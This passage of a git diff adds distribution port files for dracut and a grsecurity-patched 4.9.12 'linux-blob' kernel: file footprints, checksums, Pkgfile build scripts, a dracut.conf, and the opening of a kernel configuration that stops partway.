+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95udev-rules/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95virtfs/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95virtfs/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95virtfs/mount-virtfs.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95virtfs/parse-virtfs.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95zfcp/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95zfcp/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95zfcp/parse-zfcp.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95zfcp_rules/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95zfcp_rules/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95zfcp_rules/parse-zfcp.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/95znet/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95znet/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/95znet/parse-ccw.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/96securityfs/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/96securityfs/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/96securityfs/securityfs.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/97biosdevname/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/97biosdevname/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/97biosdevname/parse-biosdevname.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/97masterkey/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/97masterkey/masterkey.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/97masterkey/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-cmdline-ask.service
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-cmdline-ask.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-cmdline.service
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-cmdline.service.8
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-cmdline.service.8.asc
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-cmdline.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-emergency.service
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-emergency.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-initqueue.service
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-initqueue.service.8
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-initqueue.service.8.asc
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-initqueue.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-mount.service
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-mount.service.8
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-mount.service.8.asc
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-mount.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-mount.service
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-mount.service.8
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-mount.service.8.asc
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-mount.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-pivot.service
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-pivot.service.8
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-pivot.service.8.asc
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-pivot.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-trigger.service
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-trigger.service.8
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-trigger.service.8.asc
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-trigger.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-udev.service
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-udev.service.8
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-udev.service.8.asc
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-pre-udev.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-shutdown.service
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-shutdown.service.8
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-shutdown.service.8.asc
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/dracut-tmpfiles.conf
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98dracut-systemd/emergency.service
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98dracut-systemd/rootfs-generator.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/98ecryptfs/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98ecryptfs/ecryptfs-mount.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98ecryptfs/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/98integrity/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98integrity/evm-enable.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98integrity/ima-keys-load.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98integrity/ima-policy-load.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98integrity/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/98pollcdrom/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98pollcdrom/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98pollcdrom/pollcdrom.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/98selinux/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98selinux/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98selinux/selinux-loadpolicy.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/98syslog/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98syslog/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98syslog/parse-syslog-opts.sh
+-rw-rw-r--	root/root	usr/lib/dracut/modules.d/98syslog/rsyslog.conf
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98syslog/rsyslogd-start.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98syslog/rsyslogd-stop.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98syslog/syslog-cleanup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98syslog/syslog-genrules.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/98usrmount/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98usrmount/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/98usrmount/mount-usr.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/99base/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99base/dracut-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99base/init.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99base/initqueue.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99base/loginit.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99base/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99base/parse-root-opts.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99base/rdsosreport.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/99fs-lib/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99fs-lib/fs-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99fs-lib/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/99img-lib/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99img-lib/img-lib.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99img-lib/module-setup.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/99shutdown/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99shutdown/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99shutdown/shutdown.sh
+drwxrwxr-x	root/root	usr/lib/dracut/modules.d/99uefi-lib/
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99uefi-lib/module-setup.sh
+-rwxrwxr-x	root/root	usr/lib/dracut/modules.d/99uefi-lib/uefi-lib.sh
+-rwxr-xr-x	root/root	usr/lib/dracut/skipcpio
+drwxr-xr-x	root/root	usr/lib/kernel/
+drwxr-xr-x	root/root	usr/lib/kernel/install.d/
+-rwxr-xr-x	root/root	usr/lib/kernel/install.d/50-dracut.install
+-rwxr-xr-x	root/root	usr/lib/kernel/install.d/51-dracut-rescue.install
+drwxr-xr-x	root/root	usr/man/
+drwxr-xr-x	root/root	usr/man/man1/
+-rw-r--r--	root/root	usr/man/man1/lsinitrd.1.gz
+drwxr-xr-x	root/root	usr/man/man5/
+-rw-r--r--	root/root	usr/man/man5/dracut.conf.5.gz
+drwxr-xr-x	root/root	usr/man/man7/
+-rw-r--r--	root/root	usr/man/man7/dracut.bootup.7.gz
+-rw-r--r--	root/root	usr/man/man7/dracut.cmdline.7.gz
+lrwxrwxrwx	root/root	usr/man/man7/dracut.kernel.7.gz -> dracut.cmdline.7.gz
+-rw-r--r--	root/root	usr/man/man7/dracut.modules.7.gz
+drwxr-xr-x	root/root	usr/man/man8/
+-rw-r--r--	root/root	usr/man/man8/dracut-catimages.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut-cmdline.service.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut-initqueue.service.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut-mount.service.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut-pre-mount.service.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut-pre-pivot.service.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut-pre-trigger.service.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut-pre-udev.service.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut-shutdown.service.8.gz
+-rw-r--r--	root/root	usr/man/man8/dracut.8.gz
+-rw-r--r--	root/root	usr/man/man8/mkinitrd-suse.8.gz
+-rw-r--r--	root/root	usr/man/man8/mkinitrd.8.gz
+drwxr-xr-x	root/root	usr/share/
+drwxr-xr-x	root/root	usr/share/bash-completion/
+drwxr-xr-x	root/root	usr/share/bash-completion/completions/
+-rw-r--r--	root/root	usr/share/bash-completion/completions/dracut
+-rw-r--r--	root/root	usr/share/bash-completion/completions/lsinitrd
+drwxr-xr-x	root/root	usr/share/pkgconfig/
+-rw-r--r--	root/root	usr/share/pkgconfig/dracut.pc
diff --git a/linux/ports/dracut/.md5sum b/linux/ports/dracut/.md5sum
new file mode 100644
index 0000000..1f9a4b9
--- /dev/null
+++ b/linux/ports/dracut/.md5sum
@@ -0,0 +1,3 @@
+1788290da8c01d9410a01a0e1c2cc6c6  README
+fbb8b6aea24c2f7d328021bbf11788fd  dracut-044.tar.xz
+87076921f72fe891b4a904ea45b2728e  dracut.conf
diff --git a/linux/ports/dracut/Pkgfile b/linux/ports/dracut/Pkgfile
new file mode 100644
index 0000000..e187214
--- /dev/null
+++ b/linux/ports/dracut/Pkgfile
@@ -0,0 +1,25 @@
+# Description:  dracut is an event driven initramfs infrastructure. 
+# URL:          https://dracut.wiki.kernel.org/
+# Maintainer:   Silvino Silva, silvino at bk dot ru
+# Depends on:   cryptsetup nbd nfs-utils lvm2 mdadm
+
+name=dracut
+version=044
+release=2
+source=(https://www.kernel.org/pub/linux/utils/boot/$name/$name-$version.tar.xz
+dracut.conf README)
+
+build() {
+    cd $name-$version
+
+    ./configure --prefix=/usr
+
+    make
+    make DESTDIR=$PKG install
+
+    install -m 0644 -D $SRC/dracut.conf $PKG/etc
+
+    mv $PKG/usr/share/man $PKG/usr/
+    find $PKG -name "README" | xargs rm
+
+}
diff --git a/linux/ports/dracut/README b/linux/ports/dracut/README
new file mode 100755
index 0000000..d57a5da
--- /dev/null
+++ b/linux/ports/dracut/README
@@ -0,0 +1,5 @@
+
+After install run;
+
+dracut
+/usr/sbin/grub-mkconfig -o /boot/grub/grub.cfg
diff --git a/linux/ports/dracut/dracut.conf b/linux/ports/dracut/dracut.conf
new file mode 100644
index 0000000..a216be7
--- /dev/null
+++ b/linux/ports/dracut/dracut.conf
@@ -0,0 +1,16 @@
+# PUT YOUR CONFIG IN separate files
+# in /etc/dracut.conf.d named "<name>.conf"
+
+# Equivalent to -H
+hostonly="yes"
+
+# Equivalent to -m "module module module"
+dracutmodules+="dash kernel-modules rootfs-block udev-rules usrmount base fs-lib shutdown"
+
+# Equivalent to -a "module"
+add_dracutmodules+="caps debug"
+
+# Equivalent to -o "module"
+#omit_dracutmodules+="systemd systemd-bootchart systemd-networkd systemd-initrd"
+
+# SEE man dracut.conf(5) for options
diff --git a/linux/ports/linux-blob/.footprint b/linux/ports/linux-blob/.footprint
new file mode 100644
index 0000000..62181ac
--- /dev/null
+++ b/linux/ports/linux-blob/.footprint
@@ -0,0 +1,49 @@
+drwxr-xr-x	root/root	boot/
+-rw-r--r--	root/root	boot/System.map-4.9.12-blob
+-rw-r--r--	root/root	boot/config-4.9.12-blob
+-rw-r--r--	root/root	boot/vmlinuz-4.9.12-blob
+drwxr-xr-x	root/root	lib/
+drwxr-xr-x	root/root	lib/modules/
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/
+lrwxrwxrwx	root/root	lib/modules/4.9.12-blob/build -> /usr/src/linux-4.9.12
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/platform/
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/platform/soc_camera/
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/platform/soc_camera/soc_camera.ko.gz
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/platform/soc_camera/soc_camera_platform.ko.gz
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/platform/soc_camera/soc_mediabus.ko.gz
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/usb/
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/usb/gspca/
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/usb/gspca/gspca_main.ko.gz
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/usb/uvc/
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/usb/uvc/uvcvideo.ko.gz
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/v4l2-core/
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/v4l2-core/videobuf-core.ko.gz
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/v4l2-core/videobuf2-core.ko.gz
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/v4l2-core/videobuf2-memops.ko.gz
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/v4l2-core/videobuf2-v4l2.ko.gz
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/media/v4l2-core/videobuf2-vmalloc.ko.gz
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/drivers/vhost/
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/drivers/vhost/vhost_scsi.ko.gz
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/fs/
+drwxr-xr-x	root/root	lib/modules/4.9.12-blob/kernel/fs/ntfs/
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/kernel/fs/ntfs/ntfs.ko.gz
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.alias
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.alias.bin
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.builtin
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.builtin.bin
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.dep (EMPTY)
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.dep.bin
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.devname (EMPTY)
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.order
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.softdep
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.symbols
+-rw-r--r--	root/root	lib/modules/4.9.12-blob/modules.symbols.bin
+lrwxrwxrwx	root/root	lib/modules/4.9.12-blob/source -> /usr/src/linux-4.9.12
+drwxr-xr-x	root/root	usr/
+drwxr-xr-x	root/root	usr/src/
+-rw-r--r--	root/root	usr/src/4.9.12-blob-config
+-rw-r--r--	root/root	usr/src/4.9.12-cpu_optimizations.patch
+-rw-r--r--	root/root	usr/src/grsecurity-3.1-4.9.12-201702231830.patch
diff --git a/linux/ports/linux-blob/.md5sum b/linux/ports/linux-blob/.md5sum
new file mode 100644
index 0000000..2b23da8
--- /dev/null
+++ b/linux/ports/linux-blob/.md5sum
@@ -0,0 +1,7 @@
+4cfe0909ea898be7ccc712ab162be13d  config-c9
+00bc0d70f200c2673fe7dd6f02053fa4  enable_additional_cpu_optimizations_for_gcc_v4.9%2B_kernel_v3.15%2B.patch
+83b031b26dc0aeb3ccf8c45785253225  grsecurity-3.1-4.9.12-201702231830.patch
+073dfb3a13bf5836ef2d66e24ccf2ceb  linux-4.9.12.tar.xz
+bcf38b0fbf7bd83323f3202ec082b15a  port-blob-cpu.patch
+e22c8ae9bf05e1e85f5e6e6827cef368  port-blob-grsecurity.patch
+33a67ae0d1cc89895a91ff95e3565b5e  port-blob-make.patch
diff --git a/linux/ports/linux-blob/Pkgfile b/linux/ports/linux-blob/Pkgfile
new file mode 100644
index 0000000..d9767b1
--- /dev/null
+++ b/linux/ports/linux-blob/Pkgfile
@@ -0,0 +1,64 @@
+# Description:  Linux libre kernel that comes without blobs
+# URL:          http://linux-libre.fsfla.org
+# Maintainer:   Silvino, silvino at bk dot ru
+# Depends on:   grub2 dracut
+
+name=linux-blob
+version=4.9.12
+release=2
+source=(https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-$version.tar.xz \
+    https://raw.githubusercontent.com/graysky2/kernel_gcc_patch/master/enable_additional_cpu_optimizations_for_gcc_v4.9%2B_kernel_v3.15%2B.patch \
+    http://grsecurity.net/test/grsecurity-3.1-4.9.12-201702231830.patch \
+    port-blob-grsecurity.patch \
+    port-blob-make.patch \
+    port-blob-cpu.patch \
+    config-c9)
+
+build() {
+
+    mkdir -p $PKG/usr/src
+
+    # /usr/src/version-cpu_optimizations.patch
+    install -m 0644  $SRC/enable_additional_cpu_optimizations_for_gcc_v4.9%2B_kernel_v3.15%2B.patch $PKG/usr/src/${version}-cpu_optimizations.patch
+
+    # /usr/src/grsecurity-version.patch
+    install -m 0644  $SRC/grsecurity-3.1-4.9.12-201702231830.patch $PKG/usr/src/
+
+    patch < port-blob-grsecurity.patch
+    patch < port-blob-cpu.patch
+
+    # fix to build under tpe
+    chmod -R go-w linux-$version
+
+    cd linux-$version
+
+    patch < ${SRC}/port-blob-make.patch
+
+    make distclean
+
+    patch -p1 < $SRC/grsecurity-3.1-4.9.12-201702231830.patch
+    patch -p1 < $SRC/enable_additional_cpu_optimizations_for_gcc_v4.9%2B_kernel_v3.15%2B.patch
+
+    cp $SRC/config-c9 .config
+
+    make silentoldconfig
+    # make nconfig
+    # make localmodconfig
+
+    make prepare
+
+    install -m 0644  .config $PKG/usr/src/${version}-blob-config
+
+    make LOCALVERSION= bzImage modules
+    make INSTALL_MOD_PATH=$PKG modules_install
+
+    install -m 0644 -D arch/x86_64/boot/bzImage $PKG/boot/vmlinuz-$version-blob
+    install -m 0644  System.map $PKG/boot/System.map-$version-blob
+    install -m 0644 .config $PKG/boot/config-$version-blob
+
+    rm ${PKG}/lib/modules/${version}-blob/source
+    rm ${PKG}/lib/modules/${version}-blob/build
+
+    ln -s /usr/src/linux-${version} $PKG/lib/modules/${version}-blob/source
+    ln -s /usr/src/linux-${version} $PKG/lib/modules/${version}-blob/build
+}
diff --git a/linux/ports/linux-blob/config-c9 b/linux/ports/linux-blob/config-c9
new file mode 100644
index 0000000..0bd5108
--- /dev/null
+++ b/linux/ports/linux-blob/config-c9
@@ -0,0 +1,4821 @@
+#
+# Automatically generated file; DO NOT EDIT.
+# Linux/x86 4.9.12-blob Kernel Configuration
+#
+CONFIG_64BIT=y
+CONFIG_X86_64=y
+CONFIG_X86=y
+CONFIG_INSTRUCTION_DECODER=y
+CONFIG_OUTPUT_FORMAT="elf64-x86-64"
+CONFIG_ARCH_DEFCONFIG="arch/x86/configs/x86_64_defconfig"
+CONFIG_LOCKDEP_SUPPORT=y
+CONFIG_STACKTRACE_SUPPORT=y
+CONFIG_MMU=y
+CONFIG_ARCH_MMAP_RND_BITS_MIN=27
+CONFIG_ARCH_MMAP_RND_BITS_MAX=27
+CONFIG_ARCH_MMAP_RND_COMPAT_BITS_MIN=8
+CONFIG_ARCH_MMAP_RND_COMPAT_BITS_MAX=16
+CONFIG_NEED_DMA_MAP_STATE=y
+CONFIG_NEED_SG_DMA_LENGTH=y
+CONFIG_GENERIC_ISA_DMA=y
+CONFIG_GENERIC_BUG=y
+CONFIG_GENERIC_BUG_RELATIVE_POINTERS=y
+CONFIG_GENERIC_HWEIGHT=y
+CONFIG_ARCH_MAY_HAVE_PC_FDC=y
+CONFIG_RWSEM_XCHGADD_ALGORITHM=y
+CONFIG_GENERIC_CALIBRATE_DELAY=y
+CONFIG_ARCH_HAS_CPU_RELAX=y
+CONFIG_ARCH_HAS_CACHE_LINE_SIZE=y
+CONFIG_HAVE_SETUP_PER_CPU_AREA=y
+CONFIG_NEED_PER_CPU_EMBED_FIRST_CHUNK=y
+CONFIG_NEED_PER_CPU_PAGE_FIRST_CHUNK=y
+CONFIG_ARCH_HIBERNATION_POSSIBLE=y
+CONFIG_ARCH_SUSPEND_POSSIBLE=y
+CONFIG_ARCH_WANT_HUGE_PMD_SHARE=y
+CONFIG_ARCH_WANT_GENERAL_HUGETLB=y
+CONFIG_ZONE_DMA32=y
+CONFIG_AUDIT_ARCH=y
+CONFIG_ARCH_SUPPORTS_OPTIMIZED_INLINING=y
+CONFIG_ARCH_SUPPORTS_DEBUG_PAGEALLOC=y
+CONFIG_HAVE_INTEL_TXT=y
+CONFIG_X86_64_SMP=y
+CONFIG_ARCH_SUPPORTS_UPROBES=y
+CONFIG_FIX_EARLYCON_MEM=y
+CONFIG_DEBUG_RODATA=y
+CONFIG_PGTABLE_LEVELS=4
+CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config"
+CONFIG_IRQ_WORK=y
+CONFIG_BUILDTIME_EXTABLE_SORT=y
+CONFIG_THREAD_INFO_IN_TASK=y
+
+#
+# General setup
+#
+CONFIG_INIT_ENV_ARG_LIMIT=32
+CONFIG_CROSS_COMPILE=""
+# CONFIG_COMPILE_TEST is not set
+CONFIG_LOCALVERSION=""
+# CONFIG_LOCALVERSION_AUTO is not set
+CONFIG_HAVE_KERNEL_GZIP=y
+CONFIG_HAVE_KERNEL_BZIP2=y
+CONFIG_HAVE_KERNEL_LZMA=y
+CONFIG_HAVE_KERNEL_XZ=y
+CONFIG_HAVE_KERNEL_LZO=y
+CONFIG_HAVE_KERNEL_LZ4=y
+CONFIG_KERNEL_GZIP=y
+# CONFIG_KERNEL_BZIP2 is not set
+# CONFIG_KERNEL_LZMA is not set
+# CONFIG_KERNEL_XZ is not set
+# CONFIG_KERNEL_LZO is not set
+# CONFIG_KERNEL_LZ4 is not set
+CONFIG_DEFAULT_HOSTNAME="(none)"
+CONFIG_SWAP=y
+CONFIG_SYSVIPC=y
+CONFIG_SYSVIPC_SYSCTL=y
+CONFIG_POSIX_MQUEUE=y
+CONFIG_POSIX_MQUEUE_SYSCTL=y
+CONFIG_CROSS_MEMORY_ATTACH=y
+CONFIG_FHANDLE=y
+# CONFIG_AUDIT is not set
+CONFIG_HAVE_ARCH_AUDITSYSCALL=y
+
+#
+# IRQ subsystem
+#
+CONFIG_GENERIC_IRQ_PROBE=y
+CONFIG_GENERIC_IRQ_SHOW=y
+CONFIG_GENERIC_PENDING_IRQ=y
+CONFIG_IRQ_DOMAIN=y
+CONFIG_IRQ_DOMAIN_HIERARCHY=y
+CONFIG_GENERIC_MSI_IRQ=y
+CONFIG_GENERIC_MSI_IRQ_DOMAIN=y
+CONFIG_IRQ_FORCED_THREADING=y
+CONFIG_SPARSE_IRQ=y
+CONFIG_CLOCKSOURCE_WATCHDOG=y
+CONFIG_ARCH_CLOCKSOURCE_DATA=y
+CONFIG_CLOCKSOURCE_VALIDATE_LAST_CYCLE=y
+CONFIG_GENERIC_TIME_VSYSCALL=y
+CONFIG_GENERIC_CLOCKEVENTS=y
+CONFIG_GENERIC_CLOCKEVENTS_BROADCAST=y
+CONFIG_GENERIC_CLOCKEVENTS_MIN_ADJUST=y
+CONFIG_GENERIC_CMOS_UPDATE=y
+
+#
+# Timers subsystem
+#
+CONFIG_TICK_ONESHOT=y
+CONFIG_NO_HZ_COMMON=y
+# CONFIG_HZ_PERIODIC is not set
+CONFIG_NO_HZ_IDLE=y
+# CONFIG_NO_HZ_FULL is not set
+# CONFIG_NO_HZ is not set
+CONFIG_HIGH_RES_TIMERS=y
+
+#
+# CPU/Task time and stats accounting
+#
+CONFIG_TICK_CPU_ACCOUNTING=y
+# CONFIG_VIRT_CPU_ACCOUNTING_GEN is not set
+# CONFIG_IRQ_TIME_ACCOUNTING is not set
+CONFIG_BSD_PROCESS_ACCT=y
+CONFIG_BSD_PROCESS_ACCT_V3=y
+CONFIG_TASKSTATS=y
+CONFIG_TASK_DELAY_ACCT=y
+CONFIG_TASK_XACCT=y
+CONFIG_TASK_IO_ACCOUNTING=y
+
+#
+# RCU Subsystem
+#
+CONFIG_TREE_RCU=y
+# CONFIG_RCU_EXPERT is not set
+CONFIG_SRCU=y
+# CONFIG_TASKS_RCU is not set
+CONFIG_RCU_STALL_COMMON=y
+# CONFIG_RCU_EXPEDITE_BOOT is not set
+CONFIG_BUILD_BIN2C=y
+CONFIG_IKCONFIG=y
+CONFIG_IKCONFIG_PROC=y
+CONFIG_LOG_BUF_SHIFT=19
+CONFIG_LOG_CPU_MAX_BUF_SHIFT=12
+CONFIG_NMI_LOG_BUF_SHIFT=13
+CONFIG_HAVE_UNSTABLE_SCHED_CLOCK=y
+CONFIG_ARCH_SUPPORTS_NUMA_BALANCING=y
+CONFIG_ARCH_WANT_BATCHED_UNMAP_TLB_FLUSH=y
+CONFIG_NUMA_BALANCING=y
+CONFIG_NUMA_BALANCING_DEFAULT_ENABLED=y
+CONFIG_CGROUPS=y
+CONFIG_PAGE_COUNTER=y
+CONFIG_MEMCG=y
+CONFIG_MEMCG_SWAP=y
+CONFIG_MEMCG_SWAP_ENABLED=y
+CONFIG_BLK_CGROUP=y
+CONFIG_DEBUG_BLK_CGROUP=y
+CONFIG_CGROUP_WRITEBACK=y
+CONFIG_CGROUP_SCHED=y
+CONFIG_FAIR_GROUP_SCHED=y
+CONFIG_CFS_BANDWIDTH=y
+CONFIG_RT_GROUP_SCHED=y
+CONFIG_CGROUP_PIDS=y
+# CONFIG_CGROUP_FREEZER is not set
+CONFIG_CPUSETS=y
+# CONFIG_PROC_PID_CPUSET is not set
+CONFIG_CGROUP_DEVICE=y
+CONFIG_CGROUP_CPUACCT=y
+CONFIG_CGROUP_PERF=y
+# CONFIG_CGROUP_DEBUG is not set
+CONFIG_NAMESPACES=y
+CONFIG_UTS_NS=y
+CONFIG_IPC_NS=y
+CONFIG_USER_NS=y
+CONFIG_PID_NS=y
+CONFIG_NET_NS=y
